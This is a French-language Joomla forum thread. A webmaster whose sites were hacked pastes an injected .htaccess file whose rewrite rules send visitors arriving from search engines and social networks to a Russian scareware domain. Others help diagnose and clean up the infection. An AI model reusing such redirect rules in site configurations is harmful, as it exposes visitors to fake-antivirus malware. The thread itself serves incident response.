Problème de sécurité: Fake App Attack: Fake AV Redirect 21

Réduire
X
Réduire
 
  • Page sur 1
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages
Précédent template Suivant
  • #1

    Problème de sécurité: Fake App Attack: Fake AV Redirect 21

    Bonjour,

    J'ai créé un nouveau site sous joomla 2.5.x et quelques utilisateurs m'ont remonté un problème lors de l'activation de leurs comptes.
    En effet, lorsque ces utilisateurs cliquent sur leurs liens d'activation, leurs antivirus (norton, avast) détectent un problème de sécurité :
    13/04/2012 09:25:31,Elevée,Une tentative d’intrusion par preventiontoolsscanning.info a été bloquée.,Bloqué,Aucune action nécessaire,Fake App Attack: Fake AV Redirect 21
    Après quelques recherches, j'ai vu que cela pouvait venir de mon site même si les autres utilisateurs n'ont pas eu ce problème... J'ai donc cherché un peu d'où cela pouvait venir et je me suis penché sur le fichier .htaccess. Dans ce dernier j'ai vu des choses bizarres comme :
    Code:
    							
																														<IfModule mod_rewrite.c>																														
																														RewriteEngine On																														
																														RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)																														
																														RewriteRule ^(.*)$ http://kas-baa.ru/space?7 [R=301,L]																														
																														RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)																														
																														RewriteRule ^(.*)$ http://kas-baa.ru/space?7 [R=301,L]																														
																														</IfModule>
    J'avais bien renommé le htaccess.txt mais dans le doute je l'ai supprimé et j'ai mis un .htaccess VIDE! Quelques heures plus tard, j'ai regardé le contenu du htaccess et j'y ai trouvé ce que je vous ai mis ci-dessus. J'ai testé l'adresse qui est stipulé dans le "RewriteRule" (A NE PAS TESTER!!!!) et ça redirige bien vers un scareware de type Fake AV Redirect 21.

    Ma question est :

    "Mon fichier .htaccess étant en lecture seul et vide à l'origine, comment peut il se retrouver modifié et comment empêcher cela?"

    Merci d'avance pour votre aide

    Toots
    Tags: Aucun
  • #2
    Re : Problème de sécurité: Fake App Attack: Fake AV Redirect 21

    Sujet déplacé dans la section "sécurité", le site ayant manifestement été piraté.
    Tu dois avoir quelque part dans des fichiers de ton site un script qui régénère ces fichiers .htaccess.
    Teste-le avec sucuri.net qui t'orientera probablement vers les fichiers distants touchés, mais vérifie si ton ordinateur n'a pas été infecté.
    "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
    MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr chez PHPNET, sites perso chez PlanetHoster + sites gérés chez PHPNET, PlanetHoster, Ionos et OVH

    Commentaire

    • #3
      Re : Problème de sécurité: Fake App Attack: Fake AV Redirect 21

      Merci pour ta réponse et en effet , le fichier est régénéré car j'ai supprimé le htaccess et je viens de voir qu'il est réapparu tout seul.

      Apres vvoir passé mon site en scan avec sucuri voici ce qu'il me dit :
      Cliquez sur l'image pour l'afficher en taille normale Nom : 2012-04-14_152725.jpg  Affichages : 1  Taille : 169,7 Ko  ID : 1801040

      Malheureusement je ne trouve rien dans tous les répertoires qu'il nomme mise à part la premiere adresse qui ne me dit rien (404testpage...). Jen esais pas comment trouver ce fameux script. Existe t il d'autres outils permettant de cibler un peu plus le script?
      Dernière édition par Toots à 14/04/2012, 14h33

      Commentaire

      • #4
        Re : Problème de sécurité: Fake App Attack: Fake AV Redirect 21

        Au vu de la capture, il serait bien de passer ta machine au scan approfondi avec malwarebytes, puis avec un AV.

        Commentaire

        • #5
          Re : Problème de sécurité: Fake App Attack: Fake AV Redirect 21

          Ma machine, le serveur ou mon pc? Sachant que mon serveur est une location d'hébergement. Si c'est de mon PC que tu parles, je comptais passer tout ca cette nuit justement mais ce n'est pas mon pc qui régénére le htaccess sur mon hébergement.

          Merci beaucoup pour votre aide

          Commentaire

          • #6
            Re : Problème de sécurité: Fake App Attack: Fake AV Redirect 21

            Ton PC bien sûr !

            mais ce n'est pas mon pc qui régénére le htaccess sur mon hébergement.
            Si ton pc a été contaminé par un malware/troyen et autres joyeusetés, il a contaminé tout ce qui se trouve sous son passage: PC, serveur local, serveur distant.

            Commentaire

            • #7
              Re : Problème de sécurité: Fake App Attack: Fake AV Redirect 21

              Aprés avoir passé 12 bonnes heures à scanner l’intégralité de mon PC, mon antivirus n'a rien détecté (Antivir). Par contre , je en sais toujours pas comment trouver le script qui génère le htaccess.

              Une autre idée, logiciel, composant, ...?

              Commentaire

              • #8
                Re : Problème de sécurité: Fake App Attack: Fake AV Redirect 21

                Antivir ? C'est un AV pour Papy/Mamy qui ne font pas du P2P, ne télécharge pas des keygen etc. et c'est tout ce qu'on veut sauf un soft fait pour ça. Tu lis les messages que l'on te donne ?

                il serait bien de passer ta machine au scan approfondi avec malwarebytes

                Commentaire

                • #9
                  Re : Problème de sécurité: Fake App Attack: Fake AV Redirect 21

                  Antivir ? C'est un AV pour Papy/Mamy qui ne font pas du P2P, ne télécharge pas des keygen etc. et c'est tout ce qu'on veut sauf un soft fait pour ça.
                  J’apprécie l'aide que vous me fournissez mais moins ce genre de commentaire qui n'est qu'un avis infondé et qui ne font pas avancer le dossier. J'utilise Avira depuis un bon moment et il est et a été efficace la ou avast et Norton n'ont pas su l'être. A savoir aussi que certain logiciel comme norton utilise leur base de données virale...Je n'ai jamais eu de problème avec ce logiciel et cela est fondé par une certaine expérience... bref je ne suis pas la pour parler de logiciel antivirus.

                  Pour le malware, j'ai aussi scanné et rien, j'ai juste oublié de le préciser...

                  Après quelques recherches, cela serait une infection provoqué par une injection perl sur les sites présentant la faille idéal. De ce fait cela ne vient donc pas de mon ordinateur. Je continu ma recherche sur la façon de corriger ce problème sans avoir à tout réinstaller.

                  Je vous tiens informé si toutefois ce sujet reste dans son objectif premier.

                  __________________________________________________ _______________

                  MAJ du 16/04/2012
                  Le problème ne concerne pas que Joomla apparemment. En effet, plein de sites ont ce problème quelque soit la plateforme ou l'hébergement. Perso, je me suis rendu compte que ces fameux fichiers htaccess qui se régénèrent sont dans tout les répertoires racine de mes sites et même au delà (Au dessus du répertoire public_html). J'ai contacté mon hébergeur afin de voir ce que nous pourrions faire.

                  __________________________________________________ _________________

                  Maj du 17/04/2012
                  Suite à une conversation téléphonique avec mon hébergeur, j'ai eu confirmation que ce genre de problème était très fréquent et que pour le cas de joomla, cela pourrait venir d'une extension ou même du template. Les seuls moyens de trouver le script qui régénère les htaccess sont:
                  - De comparer les sauvegardes afin de situer la date de l'exploit, permettant ainsi de comparer avec les dernières actions menées sur le site. (En partant du principe que cette faille n'était pas existante avant). Les logs étant inutiles de par l'"antidatage" des fichiers pirates.
                  - De partir d'une sauvegarde saine en mettant joomla ainsi que ces extensions à jour, tout en jetant un oeil sur la liste des extensions vulnérables (http://docs.joomla.org/Vulnerable_Ex...dvideoshare.29)

                  Des heures de boulots en perspective
                  Dernière édition par Toots à 17/04/2012, 10h47

                  Commentaire

                  • #10
                    Re : Problème de sécurité: Fake App Attack: Fake AV Redirect 21

                    Limite une réinstallation est plus rapide!
                    Mon site sur Pink : http://pink-addiction.fr/

                    Commentaire

                    • #11
                      Re : Problème de sécurité: Fake App Attack: Fake AV Redirect 21

                      Malheureusement, j'ai 6 sites web qui ont tous été infectées. Je ne sais pas par lequel tout cela est arrivé mais comme j'ai une sauvegarde saine ftp et bdd de 5 d'entre eux datant du 10 février, j'ai opté pour la suppression de tout et la remise en place des fichier et bdd.
                      Pour le moment j'ai redirigé tous les sous domaines vers une page html de maintenance et remettrais les sites en ligne petit à petit après avoir mis tout à jour.

                      Commentaire

                      Précédent template Suivant

                      Annonce

                      Réduire
                      Aucune annonce pour le moment.

                      Partenaire de l'association

                      Réduire
                      Hébergeur Web PlanetHoster
                      Travaille ...
                      X